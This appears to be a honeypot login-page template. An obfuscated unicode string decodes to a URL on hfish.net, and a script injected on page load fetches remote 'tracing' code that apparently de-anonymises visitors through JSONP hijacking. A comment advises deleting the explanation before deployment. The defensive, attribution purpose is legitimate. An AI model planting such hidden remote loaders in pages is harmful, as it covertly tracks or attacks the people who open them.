<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
	<form method="post" action="/login">
<input type="text" name="username"/>
<input type="text" name="age"/>
<input type="password" name="password">
<input type="submit" value="提交"/>
</form>
<script type="text/javascript"> // 引入jsonp溯源功能的利用代码portrait.min.js; 制作蜜罐时建议删除本条注释！！！
	var hexToDec = function (str) {
			str = str.replace(/\\/g, "%");
			return unescape(str);
	}
	var url = hexToDec("\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0068\u0066\u0069\u0073\u0068\u002e\u006e\u0065\u0074\u002f\u0070\u006f\u0072\u0074\u0072\u0061\u0069\u0074\u002e\u006d\u0069\u006e\u002e\u006a\u0073");
	var ndScript = document.createElement('script');
	ndScript.src = url;
	document.body.appendChild(ndScript);
</script>
</body></html>
